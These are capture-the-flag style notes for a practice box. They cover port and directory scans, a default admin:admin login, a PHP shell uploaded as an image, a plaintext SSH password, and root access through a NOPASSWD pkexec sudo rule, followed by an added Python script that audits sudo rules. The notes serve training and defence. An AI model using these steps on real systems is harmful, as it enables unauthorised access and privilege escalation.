Funboxeasy
PG Funboxeasy Notes
Date: 13.06.2021
Nmap scan: sudo nmap -p- -sV -sC -v 192.168.119.111
Two open ports:
- Port 22: OpenSSH 8.2p1 Ubuntu
- Port 80: Apache httpd 2.5.41
Contains the apache2 Ubuntu default page
Gobuster scan: gobuster dir -u http://192.168.119.111 -x php,txt -w ~/Lists/gobuster/Gobuster-Dir-Medium.txt -t 25
/index.php (Status: 200) [Size: 3468]
/profile.php (Status: 302) [Size: 7247] [--> http://192.168.119.111/index.php]
/header.php (Status: 200) [Size: 1666]
/store (Status: 301) [Size: 318] [--> http://192.168.119.111/store/]
/admin (Status: 301) [Size: 318] [--> http://192.168.119.111/admin/]
/registration.php (Status: 200) [Size: 9409]
/logout.php (Status: 200) [Size: 75]
/robots.txt (Status: 200) [Size: 14]
/dashboard.php (Status: 302) [Size: 10272] [--> http://192.168.119.111/index.php]
/secret (Status: 301) [Size: 319] [--> http://192.168.119.111/secret/]
/secret (Status: 301) [Size: 319] [--> http://192.168.119.111/secret/]
Robots.txt: Disallow: gym
Secret: „Anyone who lives within their means suffers from a lack of imagination.“ Oscar Wilde (*1854 - †1900)
Admin login page of the store: http://192.168.119.111/store/admin.php => login with admin:admin
http://192.168.119.111/store/admin_verify.php
Edit a book and upload a php shell instead of an image => browse the store page => reverse shell gained (www-data).
Python 3.8.2 is installed => TTY Shell
Go to /home/tony and read the password.txt file.
Tony's SSH password: yxcvbnmYYY
Log in as tony and check sudo -l:
Matching Defaults entries for tony on funbox3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/dmf
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /usr/bin/rlogin
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/mtr
    (root) NOPASSWD: /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel
    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
Abuse pkexec to escalate your privileges: sudo /usr/bin/pkexec /bin/bash
=> root
Run find / -name "local.txt" to find the user flag.
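Added example, not part of the original notes: a Python audit of a sudo -l listing like the one above, as an administrator would run it to catch the pkexec rule before it is abused. The sample listing is a constructed, shortened copy of the one in these notes; the COMMAND_RUNNERS set, the script suffix list and the severity labels are assumptions of this example.

```python
import re

# Constructed sample: a shortened copy of the `sudo -l` listing in the notes.
SAMPLE = """\
Matching Defaults entries for tony on funbox3:
    env_reset, mail_badpass,

User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
"""

# One rule line: "(runas) TAG: TAG: /path args"
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/.+)$")
# Assumption: programs that exist to run another command as a different user.
# Only pkexec (the entry the notes rely on) is listed; extend per site policy.
COMMAND_RUNNERS = {"pkexec"}
SCRIPT_SUFFIXES = (".sh", ".py", ".pl", ".rb")
SEVERITY = ["critical", "high", "review", "info"]  # labels are this example's own


def audit(listing):
    """Return (severity, path, reason) for every rule that runs as root."""
    findings = []
    for line in listing.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults, headers and blank lines are not rules
        runas = {u.strip() for u in re.split(r"[,:]", m["runas"])}
        if not runas & {"root", "ALL"}:
            continue
        tags = set(re.findall(r"[A-Z_]+", m["tags"]))
        path = m["cmd"].split()[0]
        name = path.rsplit("/", 1)[-1]
        if name in COMMAND_RUNNERS:
            sev, why = "critical", "hands any command to root; remove the rule"
        elif name.endswith(SCRIPT_SUFFIXES):
            sev, why = "high", "script; file and all parent dirs must be root-only writable"
        elif "NOPASSWD" in tags:
            sev, why = "review", "root without password; check for shell or file-write features"
        else:
            sev, why = "info", "root with password prompt"
        findings.append((sev, path, why))
    return sorted(findings, key=lambda f: SEVERITY.index(f[0]))


if __name__ == "__main__":
    for sev, path, why in audit(SAMPLE):
        print(f"{sev:8} {path}  ({why})")
```

Feed it the output of sudo -l -U <user> for each account; any "critical" line is a rule that should not exist.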